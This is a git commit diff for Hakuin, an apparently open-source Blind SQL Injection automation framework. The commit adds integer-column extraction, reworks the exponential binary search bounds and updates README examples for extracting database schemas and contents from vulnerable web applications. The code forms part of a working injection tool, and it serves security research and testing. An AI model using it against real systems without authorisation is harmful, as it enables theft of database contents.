integer columns extraction, readme update, logo background

2024-09-08 03:30:41 +02:00 · 2023-10-29 17:05:38 +08:00 · 2023-10-29 17:05:38 +08:00 · dc0bc22682
commit dc0bc22682
parent 30c08a8a44
13 changed files with 169 additions and 51 deletions
--- a/README.md
+++ b/README.md
@ -2,13 +2,14 @@
    <img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
 </p>

-Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.
+Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content.

-Hakuin been presented at academic and industrial conferences:
- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
+Hakuin has been presented at esteemed academic and industrial conferences:
+- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
 - [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023
+- [IEEE S&P Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023

-Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
+More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).


 ## Installation
@ -48,9 +49,9 @@ class ContentRequester(Requester):
        return 'found' in r.content.decode()
 ```

-To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
+To start extracting data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.

-##### Example 1 - Inferring SQLite DBs
+##### Example 1 - Extracting SQLite DBs
 ```python
 from hakuin.dbms import SQLite
 from hakuin import Extractor, Requester
@ -58,43 +59,43 @@ from hakuin import Extractor, Requester
 class StatusRequester(Requester):
    ...

-exf = Extractor(requester=StatusRequester(), dbms=SQLite())
+ext = Extractor(requester=StatusRequester(), dbms=SQLite())
 ```

-##### Example 2 - Inferring MySQL DBs
+##### Example 2 - Extracting MySQL DBs
 ```python
 from hakuin.dbms import MySQL
 ...
-exf = Extractor(requester=StatusRequester(), dbms=MySQL())
+ext = Extractor(requester=StatusRequester(), dbms=MySQL())
 ```

-Now that eveything is set, you can start inferring DB schemas.
+Now that eveything is set, you can start extracting DB schemas.

-##### Example 1 - Inferring DB Schemas
+##### Example 1 - Extracting DB Schemas
 ```python
 # strategy:
 #   'binary':   Use binary search
 #   'model':    Use pre-trained models
-schema = exf.extract_schema(strategy='model')
+schema = ext.extract_schema(strategy='model')
 ```

-##### Example 2 - Inferring DB Schemas with Metadata
+##### Example 2 - Extracting DB Schemas with Metadata
 ```python
 # metadata:
 #   True:   Detect column settings (data type, nullable, primary key)
 #   False:  Pass
-schema = exf.extract_schema(strategy='model', metadata=True)
+schema = ext.extract_schema(strategy='model', metadata=True)
 ```

-##### Example 3 - Inferring only Table/Column Names
+##### Example 3 - Extracting only Table/Column Names
 ```python
-tables = exf.extract_table_names(strategy='model')
-columns = exf.extract_column_names(table='users', strategy='model')
+tables = ext.extract_table_names(strategy='model')
+columns = ext.extract_column_names(table='users', strategy='model')
 ```

 Once you know the schema, you can extract the actual content.

-##### Example 1 - Inferring Textual Columns
+##### Example 1 - Extracting Textual Columns
 ```python
 # strategy:
 #   'binary':       Use binary search
@ -102,7 +103,12 @@ Once you know the schema, you can extract the actual content.
 #   'unigram':      Use unigram model
 #   'dynamic':      Dynamically identify the best strategy. This setting
 #                   also enables opportunistic guessing.
-res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):
+res = ext.extract_column_text(table='users', column='address', strategy='dynamic'):
+```
+
+##### Example 2 - Extracting Integer Columns
+```python
+res = ext.extract_column_int(table='users', column='id'):
 ```

 More examples can be found in the `tests` directory.
@ -110,7 +116,7 @@ More examples can be found in the `tests` directory.


 ## For Researchers
-This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
+This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.


 #### Cite Hakuin
--- a/hakuin/Extractor.py
+++ b/hakuin/Extractor.py
@ -25,7 +25,7 @@ class Extractor:
                            models with Huffman trees

        Returns:
-            list: List of extracted table names
+            list: list of extracted table names
        '''
        allowed = ['binary', 'model']
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -35,8 +35,10 @@ class Extractor:
        n_rows = search_alg.IntExponentialBinarySearch(
            requester=self.requester,
            query_cb=self.dbms.TablesQueries.rows_count,
+            lower=0,
            upper=8,
-            find_range=True,
+            find_lower=False,
+            find_upper=True,
        ).run(ctx)

        if strategy == 'binary':
@ -61,7 +63,7 @@ class Extractor:
                        models with Huffman trees

        Returns:
-            list: List of extracted column names
+            list: list of extracted column names
        '''
        allowed = ['binary', 'model']
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -71,8 +73,10 @@ class Extractor:
        n_rows = search_alg.IntExponentialBinarySearch(
            requester=self.requester,
            query_cb=self.dbms.ColumnsQueries.rows_count,
+            lower=0,
            upper=8,
-            find_range=True,
+            find_lower=False,
+            find_upper=True,
        ).run(ctx)

        if strategy == 'binary':
@ -137,7 +141,7 @@ class Extractor:
        return schema


-    def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
+    def extract_column_text(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
        '''Extracts text column.

        Params:
@ -152,7 +156,7 @@ class Extractor:
            n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set

        Returns:
-            list: List of strings in the column
+            list: list of strings in the column
        '''
        allowed = ['binary', 'unigram', 'fivegram', 'dynamic']
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -161,8 +165,10 @@ class Extractor:
        n_rows = search_alg.IntExponentialBinarySearch(
            requester=self.requester,
            query_cb=self.dbms.RowsQueries.rows_count,
+            lower=0,
            upper=n_rows_guess,
-            find_range=True,
+            find_lower=False,
+            find_upper=True,
        ).run(ctx)

        if strategy == 'binary':
@ -185,3 +191,30 @@ class Extractor:
                queries=self.dbms.RowsQueries,
                charset=charset,
            ).run(ctx, n_rows)
+
+
+    def extract_column_int(self, table, column, n_rows_guess=128):
+        '''Extracts text column.
+
+        Params:
+            table (str): table name
+            column (str): column name
+            n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
+
+        Returns:
+            list: list of integers in the column
+        '''
+        ctx = search_alg.Context(table, column, None, None)
+        n_rows = search_alg.IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.dbms.RowsQueries.rows_count,
+            lower=0,
+            upper=n_rows_guess,
+            find_lower=False,
+            find_upper=True,
+        ).run(ctx)
+
+        return collect.IntCollector(
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
+        ).run(ctx, n_rows)
--- a/hakuin/collectors.py
+++ b/hakuin/collectors.py
@ -60,6 +60,22 @@ class Collector(metaclass=ABCMeta):
        raise NotImplementedError()


+class IntCollector(Collector):
+    '''Collector for integer columns'''
+    def __init__(self, requester, queries):
+        super().__init__(requester, queries)
+
+
+    def collect_row(self, ctx):
+        return IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.queries.int,
+            lower=0,
+            upper=128,
+            find_lower=True,
+            find_upper=True,
+        ).run(ctx)
+

 class TextCollector(Collector):
    '''Collector for text columns.'''
@ -218,7 +234,8 @@ class BinaryTextCollector(TextCollector):
            query_cb=self.queries.char_unicode,
            lower=ASCII_MAX + 1,
            upper=UNICODE_MAX + 1,
-            find_range=False,
+            find_lower=False,
+            find_upper=False,
            correct=correct_ord,
        )
        res = search_alg.run(ctx)
--- a/hakuin/dbms/MySQL.py
+++ b/hakuin/dbms/MySQL.py
@ -293,6 +293,16 @@ class MySQLRowsQueries(UniformQueries):
        return self.normalize(query)


+    def int(self, ctx, n):
+        query = f'''
+            SELECT  {MySQL.escape(ctx.column)} < {n}
+            FROM    {MySQL.escape(ctx.table)}
+            LIMIT   1
+            OFFSET  {ctx.row}
+        '''
+        return self.normalize(query)
+
+

 class MySQL(DBMS):
    DATA_TYPES = [
--- a/hakuin/dbms/SQLite.py
+++ b/hakuin/dbms/SQLite.py
@ -278,6 +278,14 @@ class SQLiteRowsQueries(UniformQueries):
        return self.normalize(query)


+    def int(self, ctx, n):
+        query = f'''
+            SELECT  {SQLite.escape(ctx.column)} < {n}
+            FROM    {SQLite.escape(ctx.table)}
+            LIMIT   1
+            OFFSET  {ctx.row}
+        '''
+        return self.normalize(query)



--- a/hakuin/search_algorithms.py
+++ b/hakuin/search_algorithms.py
@ -44,7 +44,7 @@ class SearchAlgorithm(metaclass=ABCMeta):

 class IntExponentialBinarySearch(SearchAlgorithm):
    '''Exponential and binary search for integers.'''
-    def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
+    def __init__(self, requester, query_cb, lower=0, upper=16, find_lower=False, find_upper=True, correct=None):
        '''Constructor.

        Params:
@ -52,13 +52,15 @@ class IntExponentialBinarySearch(SearchAlgorithm):
            query_cb (function): query construction function
            lower (int): lower bound of search range
            upper (int): upper bound of search range
-            find_range (bool): exponentially expands range until the correct value is within 
+            find_lower (bool): exponentially expands the lower bound until the correct value is within 
+            find_upper (bool): exponentially expands the upper bound until the correct value is within 
            correct (int|None): correct value. If provided, the search is emulated
        '''
        super().__init__(requester, query_cb)
        self.lower = lower
        self.upper = upper
-        self.find_range = find_range
+        self.find_lower = find_lower
+        self.find_upper = find_upper
        self.correct = correct
        self.n_queries = 0

@ -74,29 +76,42 @@ class IntExponentialBinarySearch(SearchAlgorithm):
        '''
        self.n_queries = 0

-        if self.find_range:
-            lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
-        else:
-            lower, upper = self.lower, self.upper
+        if self.find_lower:
+            self._find_lower(ctx, self.upper - self.lower)
+        if self.find_upper:
+            self._find_upper(ctx, self.upper - self.lower)

-        return self._search(ctx, lower, upper)
+        return self._search(ctx, self.lower, self.upper)


-    def _find_range(self, ctx, lower, upper):
-        '''Exponentially expands the search range until the correct value is within.
+    def _find_lower(self, ctx, step):
+        '''Exponentially expands the lower bound until the correct value is within.

        Params:
            ctx (Context): extraction context
-            lower (int): lower bound
-            upper (int): upper bound
-
-        Returns:
-            int: correct upper bound
+            step (int): initial step
        '''
-        if self._query(ctx, upper):
-            return lower, upper
+        if not self._query(ctx, self.lower):
+            return

-        return self._find_range(ctx, upper, upper * 2)
+        self.upper = self.lower
+        self.lower -= step
+        self._find_lower(ctx, step * 2)
+
+
+    def _find_upper(self, ctx, step):
+        '''Exponentially expands the upper bound until the correct value is within.
+
+        Params:
+            ctx (Context): extraction context
+            step (int): initial step
+        '''
+        if self._query(ctx, self.upper):
+            return
+
+        self.lower = self.upper
+        self.upper += step
+        self._find_upper(ctx, step * 2)


    def _search(self, ctx, lower, upper):
--- a/logo.png
+++ b/logo.png
--- a/tests/dbs/data_types.sqlite
+++ b/tests/dbs/data_types.sqlite
--- a/tests/test_data_types.py
+++ b/tests/test_data_types.py
@ -0,0 +1,28 @@
+import json
+import logging
+
+import hakuin
+from hakuin import Extractor
+from hakuin.dbms import SQLite
+
+from OfflineRequester import OfflineRequester
+
+
+
+logging.basicConfig(level=logging.INFO)
+
+
+
+def main():
+    requester = OfflineRequester(db='data_types', verbose=True)
+    ext = Extractor(requester=requester, dbms=SQLite())
+
+    # res = ext.extract_schema(strategy='binary')
+    # print(res)
+
+    res = ext.extract_column_int('data_types', 'integer')
+    
+
+
+if __name__ == '__main__':
+    main()
--- a/tests/test_large_content.py
+++ b/tests/test_large_content.py
@ -25,7 +25,7 @@ def main():
    ext = Extractor(requester=requester, dbms=SQLite())

    if len(sys.argv) == 3:
-        res = ext.extract_column(sys.argv[1], sys.argv[2])
+        res = ext.extract_column_text(sys.argv[1], sys.argv[2])
        print('Total requests:', requester.n_queries)
        print('Average RPC:', requester.n_queries / len(''.join(res)))
    else:
@ -43,7 +43,7 @@ def main():
        # measure rpc
        for table, columns in rpc.items():
            for column in columns:
-                res = ext.extract_column(table, column)
+                res = ext.extract_column_text(table, column)
                res_len = len(''.join(res))
                col_rpc = requester.n_queries / len(''.join(res))
                rpc[table][column] = (requester.n_queries, col_rpc)
--- a/tests/test_large_schema.py
+++ b/tests/test_large_schema.py
@ -13,7 +13,7 @@ logging.basicConfig(level=logging.INFO)


 def main():
-    requester = OfflineRequester(db='large_schema')
+    requester = OfflineRequester(db='large_schema', verbose=False)
    ext = Extractor(requester=requester, dbms=SQLite())

    res = ext.extract_schema()
--- a/tests/test_online.py
+++ b/tests/test_online.py
@ -47,7 +47,8 @@ def main():
        res = ext.extract_schema(strategy='model', metadata=True)
        print(json.dumps(res, indent=4))
    else:
-        res = ext.extract_column(table, column)
+        res = ext.extract_column_text(table, column)
+        # res = ext.extract_column_int(table, column)
        print(json.dumps(res, indent=4))


--- a/tests/test_unicode.py
+++ b/tests/test_unicode.py
@ -20,7 +20,7 @@ def main():
    res = ext.extract_schema(strategy='binary')
    print(res)

-    res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
+    res = ext.extract_column_text('Ħ€ȽȽ©', 'ŴǑȒȽƉ')